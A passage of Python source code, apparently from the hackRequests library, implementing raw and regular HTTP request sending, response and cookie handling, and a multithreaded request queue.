"http" and scheme != "https": 123 | raise Exception("http/https only") 124 | hostname = p.netloc 125 | port = 80 if scheme == "http" else 443 126 | if ":" in hostname: 127 | hostname, port = hostname.split(":") 128 | path = "" 129 | if p.path: 130 | path = p.path 131 | if p.query: 132 | path = path + "?" + p.query 133 | if realhost: 134 | if ":" not in realhost: 135 | realhost = realhost + ":80" 136 | hostname, port = realhost.split(":") 137 | return scheme, hostname, int(port), path 138 | 139 | def _send_output(self, oldfun, con, log): 140 | def _send_output_hook(*args, **kwargs): 141 | log['request'] = b"\r\n".join(con._buffer).decode('utf-8') 142 | oldfun(*args, **kwargs) 143 | con._send_output = oldfun 144 | 145 | return _send_output_hook 146 | 147 | def httpraw(self, raw: str, **kwargs): 148 | raw = raw.strip() 149 | proxy = kwargs.get("proxy", None) 150 | real_host = kwargs.get("real_host", None) 151 | ssl = kwargs.get("ssl", False) 152 | location = kwargs.get("location", True) 153 | 154 | scheme = 'http' 155 | port = 80 156 | if ssl: 157 | scheme = 'https' 158 | port = 443 159 | 160 | try: 161 | index = raw.index('\n') 162 | except ValueError: 163 | raise Exception("ValueError") 164 | log = {} 165 | try: 166 | method, path, protocol = raw[:index].split(" ") 167 | except: 168 | raise Exception("Protocol format error") 169 | raw = raw[index + 1:] 170 | 171 | try: 172 | host_start = raw.index("Host: ") 173 | host_end = raw.index('\n', host_start) 174 | 175 | except ValueError: 176 | raise ValueError("Host headers not found") 177 | 178 | if real_host: 179 | host = real_host 180 | if ":" in real_host: 181 | host, port = real_host.split(":") 182 | else: 183 | host = raw[host_start + len("Host: "):host_end] 184 | if ":" in host: 185 | host, port = host.split(":") 186 | raws = raw.splitlines() 187 | headers = {} 188 | 189 | # index = 0 190 | # for r in raws: 191 | # raws[index] = r.lstrip() 192 | # index += 1 193 | 194 | index = 0 195 | for r in raws: 196 | if r == "": 197 | break 198 | try: 199 | k, v = r.split(": ") 200 | except: 201 | k = r 202 | v = "" 203 | headers[k] = v 204 | index += 1 205 | headers["Connection"] = "close" 206 | if len(raws) < index + 1: 207 | body = '' 208 | else: 209 | body = '\n'.join(raws[index + 1:]).lstrip() 210 | 211 | urlinfo = scheme, host, int(port), path 212 | 213 | try: 214 | conn = self.httpcon.get_con(urlinfo, proxy=proxy) 215 | except: 216 | raise 217 | conn._send_output = self._send_output(conn._send_output, conn, log) 218 | try: 219 | conn.putrequest(method, path, skip_host=True, skip_accept_encoding=True) 220 | for k, v in headers.items(): 221 | conn.putheader(k, v) 222 | if body and "Content-Length" not in headers and "Transfer-Encoding" not in headers: 223 | length = conn._get_content_length(body, method) 224 | conn.putheader("Content-Length", length) 225 | conn.endheaders() 226 | if body: 227 | if headers.get("Transfer-Encoding", '').lower() == "chunked": 228 | body = body.replace('\r\n', '\n') 229 | body = body.replace('\n', '\r\n') 230 | body = body + "\r\n" * 2 231 | log["request"] += "\r\n" + body 232 | conn.send(body.encode('utf-8')) 233 | rep = conn.getresponse() 234 | except socket.timeout: 235 | raise HackError("socket connect timeout") 236 | except socket.gaierror: 237 | raise HackError("socket don't get hostname") 238 | except KeyboardInterrupt: 239 | raise HackError("user exit") 240 | finally: 241 | conn.close() 242 | log["response"] = "HTTP/%.1f %d %s" % ( 243 | rep.version * 0.1, rep.status, 244 | rep.reason) + '\r\n' + str(rep.msg) 245 | if port == 80 or port == 443: 246 | _url = "{scheme}://{host}{path}".format(scheme=scheme, host=host, path=path) 247 | else: 248 | _url = "{scheme}://{host}{path}".format(scheme=scheme, host=host + ":" + port, path=path) 249 | 250 | redirect = rep.msg.get('location', None) # handle 301/302 251 | if redirect and location: 252 | if not redirect.startswith('http'): 253 | redirect = parse.urljoin(_url, redirect) 254 | return self.http(redirect, post=None, method=method, headers=headers, location=True, locationcount=1) 255 | 256 | return response(rep, _url, log, ) 257 | 258 | def http(self, url, **kwargs): 259 | method = kwargs.get("method", "GET") 260 | post = kwargs.get("post", None) or kwargs.get("data", None) 261 | location = kwargs.get('location', True) 262 | locationcount = kwargs.get("locationcount", 0) 263 | 264 | proxy = kwargs.get('proxy', None) 265 | headers = kwargs.get('headers', {}) 266 | 267 | # real host:ip 268 | real_host = kwargs.get("real_host", None) 269 | 270 | if isinstance(headers, str): 271 | headers = extract_dict(headers.strip(), '\n', ': ') 272 | cookie = kwargs.get("cookie", None) 273 | if cookie: 274 | cookiestr = cookie 275 | if isinstance(cookie, dict): 276 | cookiestr = "" 277 | for k, v in cookie.items(): 278 | cookiestr += "{}={}; ".format(k, v) 279 | cookiestr = cookiestr.strip("; ") 280 | headers["Cookie"] = cookiestr 281 | for arg_key, h in [ 282 | ('referer', 'Referer'), 283 | ('user_agent', 'User-Agent'), ]: 284 | if kwargs.get(arg_key): 285 | headers[h] = kwargs.get(arg_key) 286 | if "Content-Length" in headers: 287 | del headers["Content-Length"] 288 | 289 | urlinfo = scheme, host, port, path = self._get_urlinfo(url, real_host) 290 | log = {} 291 | try: 292 | conn = self.httpcon.get_con(urlinfo, proxy=proxy) 293 | except: 294 | raise 295 | conn._send_output = self._send_output(conn._send_output, conn, log) 296 | tmp_headers = copy.deepcopy(headers) 297 | if post: 298 | method = "POST" 299 | if isinstance(post, str): 300 | try: 301 | post = extract_dict(post, sep="&") 302 | except: 303 | pass 304 | try: 305 | post = parse.urlencode(post) 306 | except: 307 | pass 308 | if "Content-Type" not in headers: 309 | tmp_headers["Content-Type"] = kwargs.get( 310 | "Content-type", "application/json") 311 | if 'Accept' not in headers: 312 | tmp_headers["Accept"] = tmp_headers.get("Accept", "*/*") 313 | if 'Accept-Encoding' not in headers: 314 | tmp_headers['Accept-Encoding'] = tmp_headers.get("Accept-Encoding", "gzip, deflate") 315 | if 'Connection' not in headers: 316 | tmp_headers['Connection'] = 'close' 317 | if 'User-Agent' not in headers: 318 | tmp_headers['User-Agent'] = tmp_headers['User-Agent'] if tmp_headers.get( 319 | 'User-Agent') else 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36' 320 | 321 | try: 322 | conn.request(method, path, post, tmp_headers) 323 | rep = conn.getresponse() 324 | # body = rep.read() 325 | except socket.timeout: 326 | raise HackError("socket connect timeout") 327 | except socket.gaierror: 328 | raise HackError("socket don't get hostname") 329 | except KeyboardInterrupt: 330 | raise HackError("user exit") 331 | finally: 332 | conn.close() 333 | 334 | if post: 335 | log["request"] += "\r\n\r\n" + post 336 | log["response"] = "HTTP/%.1f %d %s" % ( 337 | rep.version * 0.1, rep.status, 338 | rep.reason) + '\r\n' + str(rep.msg) 339 | 340 | redirect = rep.msg.get('location', None) # handle 301/302 341 | if redirect and location and locationcount < 10: 342 | if not redirect.startswith('http'): 343 | redirect = parse.urljoin(url, redirect) 344 | return self.http(redirect, post=None, method=method, headers=tmp_headers, location=True, 345 | locationcount=locationcount + 1) 346 | 347 | if not redirect: 348 | redirect = url 349 | log["url"] = redirect 350 | return response(rep, redirect, log, cookie) 351 | 352 | 353 | class response(object): 354 | 355 | def __init__(self, rep, redirect, log, oldcookie=''): 356 | self.rep = rep 357 | self.status_code = self.rep.status # response code 358 | self.url = redirect 359 | self._content = b'' 360 | 361 | _header_dict = dict() 362 | self.cookie = "" 363 | for k, v in self.rep.getheaders(): 364 | _header_dict[k] = v 365 | # handle cookie 366 | if k == "Set-Cookie": 367 | if ";" in v: 368 | self.cookie += v.strip().split(";")[0] + "; " 369 | else: 370 | self.cookie = v.strip() + "; " 371 | 372 | if oldcookie: 373 | cookie_dict = self._cookie_update(oldcookie, self.cookie) 374 | self.cookie = "" 375 | for k, v in cookie_dict.items(): 376 | self.cookie += "{}={}; ".format(k, v) 377 | self.cookie = self.cookie.rstrip("; ") 378 | try: 379 | self.cookies = extract_dict(self.cookie, "; ", "=") 380 | except: 381 | self.cookies = {} 382 | 383 | self.headers = _header_dict 384 | self.header = str(self.rep.msg) # response header 385 | self.log = log 386 | charset = self.rep.msg.get('content-type', 'utf-8') 387 | try: 388 | self.charset = charset.split("charset=")[1] 389 | except: 390 | self.charset = "utf-8" 391 | 392 | def content(self): 393 | if self._content: 394 | return self._content 395 | encode = self.rep.msg.get('content-encoding', None) 396 | try: 397 | body = self.rep.read() 398 | except socket.timeout: 399 | body = b'' 400 | if encode == 'gzip': 401 | body = gzip.decompress(body) 402 | elif encode == 'deflate': 403 | try: 404 | body = zlib.decompress(body, -zlib.MAX_WBITS) 405 | except: 406 | body = zlib.decompress(body) 407 | # redirect = self.rep.msg.get('location', None) # handle 301/302 408 | self._content = body 409 | return body 410 | 411 | def text(self): 412 | ''' 413 | 414 | :return: text 415 | ''' 416 | body = self.content() 417 | 418 | try: 419 | text = body.decode(self.charset, 'ignore') 420 | except: 421 | text = str(body) 422 | self.log["response"] += '\r\n' + text[:4096] 423 | return text 424 | 425 | def _cookie_update(self, old, new): 426 | ''' 427 | 用于更新旧cookie,与新cookie得出交集后返回新的cookie 428 | :param old:旧cookie 429 | :param new:新cookie 430 | :return:Str:新cookie 431 | ''' 432 | # 先将旧cookie转换为字典,再将新cookie转换为字典时覆盖旧cookie 433 | old_sep = old.strip().split(";") 434 | new_sep = new.strip().split(";") 435 | cookie_dict = {} 436 | for sep in old_sep: 437 | if sep == "": 438 | continue 439 | try: 440 | k, v = sep.split("=") 441 | cookie_dict[k.strip()] = v 442 | except: 443 | continue 444 | for sep in new_sep: 445 | if sep == "": 446 | continue 447 | try: 448 | k, v = sep.split("=") 449 | cookie_dict[k.strip()] = v 450 | except: 451 | continue 452 | return cookie_dict 453 | 454 | 455 | class threadpool: 456 | 457 | def __init__(self, threadnum, callback, timeout=10): 458 | self.thread_count = self.thread_nums = threadnum 459 | self.queue = queue.Queue() 460 | con = httpcon(timeout=timeout) 461 | self.hack = hackRequests(con) 462 | self.isContinue = True 463 | self.thread_count_lock = threading.Lock() 464 | self._callback = callback 465 | 466 | def push(self, payload): 467 | self.queue.put(payload) 468 | 469 | def changeThreadCount(self, num): 470 | self.thread_count_lock.acquire() 471 | self.thread_count += num 472 | self.thread_count_lock.release() 473 | 474 | def stop(self): 475 | self.isContinue = False 476 | 477 | def run(self): 478 | th = [] 479 | for i in range(self.thread_nums): 480 | t = threading.Thread(target=self.scan) 481 | t.setDaemon(True) 482 | t.start() 483 | th.append(t) 484 | 485 | # It can quit with Ctrl-C 486 | try: 487 | while 1: 488 | if self.thread_count > 0 and self.isContinue: 489 | time.sleep(0.01) 490 | else: 491 | break 492 | except KeyboardInterrupt: 493 | exit("User Quit") 494 | 495 | def http(self, url, **kwargs): 496 | func = self.hack.http 497 | self.queue.put({"func": func, "url": url, "kw": kwargs}) 498 | 499 | def httpraw(self, raw: str, ssl: bool = False, proxy=None, location=True): 500 | func = self.hack.httpraw 501 | self.queue.put({"func": func, "raw": raw, "ssl": ssl, 502 | "proxy": proxy, "location": location}) 503 | 504 | def scan(self): 505 | while 1: 506 | if self.queue.qsize() > 0 and self.isContinue: 507 | p = self.queue.get() 508 | else: 509 | break 510 | 511 | func = p.pop("func") 512 | url = p.get("url", None) 513 | try: 514 | if url is None: 515 | raw = p.pop('raw') 516 | h = func(raw, **p) 517 | else: 518 | h = func(url, **p.get("kw")) 519 | self._callback(h) 520 | except Exception as e: 521 | print(url, e) 522 | self.changeThreadCount(-1) 523 | 524 | 525 | def http(url, **kwargs): 526 | # timeout = kwargs.get("timeout", 10) 527 | # con = httpcon(timeout=timeout) 528 | hack = hackRequests() 529 | return hack.http(url, **kwargs) 530 | 531 | 532 | def httpraw(raw: str, **kwargs): 533 | # con = httpcon(timeout=timeout) 534 | # hack = hackRequests(con) 535 | hack = hackRequests() 536 | return hack.httpraw(raw, **kwargs) 537 | 538 | 539 | if __name__ == '__main__': 540 | pass 541 | --------------------------------------------------------------------------------